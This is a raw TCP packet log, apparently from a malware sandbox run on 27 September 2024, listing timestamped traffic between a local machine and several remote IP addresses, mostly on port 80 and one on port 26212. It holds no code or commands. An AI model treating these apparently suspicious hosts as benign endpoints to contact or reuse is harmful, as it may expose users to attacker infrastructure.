                                                                          Sep 27, 2024 04:21:15.976437092 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.976453066 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.976469040 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.976485014 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.976495028 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.976505995 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.976538897 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.976538897 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.976608992 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.976651907 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.976663113 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.976672888 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.976689100 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.976700068 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.976710081 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.976720095 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.976720095 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.976722956 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.976736069 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.976747036 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.976757050 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.976767063 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.976779938 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.976779938 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.976809025 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.976809025 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.977041960 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.977144957 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.978230000 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.978249073 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.978260994 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.978271008 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.978281021 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.978292942 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.978296041 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.978296041 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.978305101 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.978319883 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.978324890 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.978332996 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.978344917 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.978357077 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.978357077 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.978385925 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.978394032 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.978405952 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.978406906 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.978444099 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.978466988 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.978467941 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.978508949 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.991381884 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.991406918 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.991426945 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.991444111 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.991455078 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.991460085 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.991466999 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.991482019 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.991494894 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.991499901 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.991504908 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.991522074 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.991542101 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.991560936 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.001949072 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.001975060 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.001987934 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.001997948 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002010107 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002010107 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.002010107 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.002022028 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002028942 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.002036095 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002049923 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002078056 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.002078056 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.002121925 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002135038 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002146959 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002156019 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002167940 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002180099 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002182007 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.002182007 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.002191067 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002202034 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.002268076 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.002311945 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002355099 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002365112 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002377033 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002401114 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.002401114 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.002410889 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002422094 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002432108 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002445936 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.002445936 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.002460957 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.002475023 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002489090 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.002523899 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.002629995 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002643108 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002654076 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002665043 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.002688885 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.002763987 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.003010035 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.003062963 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.003072977 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.003078938 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.003086090 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.003118038 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.003118038 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.003135920 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.007371902 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.007417917 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.007436037 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.007448912 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.007447958 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.007462025 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.007473946 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.007488012 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.007502079 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.007503986 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.007503986 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.007523060 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.007541895 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.007560015 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.022785902 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.022805929 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.022816896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.022829056 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.022839069 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.022850037 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.022859097 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.022859097 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.022861958 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.022874117 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.022911072 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.022911072 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.024123907 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.024136066 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.024147034 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.024169922 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.024184942 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.024188042 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.024198055 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.024202108 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.024235964 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.024249077 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.024329901 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.024343967 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.024389982 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.024389982 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.031913042 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.031925917 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.031938076 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.031975985 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.031986952 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.032001019 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.032001019 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.032012939 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.032025099 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.032037020 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.032064915 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.032094955 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.032608032 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.032619953 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.032639027 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.032650948 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.032660961 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.032669067 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.032702923 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.032704115 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.032704115 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.032713890 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.032731056 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.032742023 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.032763004 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.032787085 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.034899950 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.034912109 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.034923077 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.034961939 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.034984112 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.034987926 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035001993 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035012960 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035024881 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035039902 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035060883 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035115004 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035121918 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035135031 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035146952 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035157919 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035168886 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035181999 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035206079 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035245895 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035258055 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035269976 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035281897 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035293102 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035300016 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035329103 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035358906 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035394907 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035407066 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035418034 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035429001 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035442114 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035446882 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035466909 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035495996 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035517931 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035531044 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035542011 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035552979 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035574913 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035605907 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035659075 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035671949 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035685062 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035696983 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035707951 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035710096 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035721064 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035736084 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035753012 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035775900 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035808086 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035820007 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035832882 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035845041 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035878897 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035900116 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.035907030 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035918951 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.035962105 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.036001921 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036015034 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036026001 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036037922 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036048889 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036061049 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.036063910 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036077976 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036081076 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.036102057 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.036143064 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.036228895 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036241055 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036251068 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036262035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036273956 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036282063 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.036287069 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036298990 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036310911 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036329985 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.036329985 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.036362886 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.036367893 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036416054 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036420107 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.036429882 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036442041 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036453009 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.036463976 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.036494970 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.036523104 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.041559935 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.041621923 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.041631937 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.041649103 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.041667938 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.041680098 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.041683912 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.041702986 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.041733980 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.041821003 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.041832924 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.041845083 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.041857004 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.041868925 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.041879892 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.041879892 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.041917086 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.041917086 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.041939020 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.041965008 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.041975975 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.041986942 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.041996956 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.042005062 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.042009115 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.042026997 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.042063951 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.042063951 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.050316095 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.052602053 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:16.057450056 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.060045004 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.060115099 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.060200930 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.060211897 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.060224056 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.060235023 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.060266018 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.060266018 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.060322046 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.060473919 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.060487032 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.060507059 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.060534954 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.060534954 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.060553074 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.061573982 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.061584949 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.061594009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.061631918 CEST8049725185.215.113.117192.168.2.5
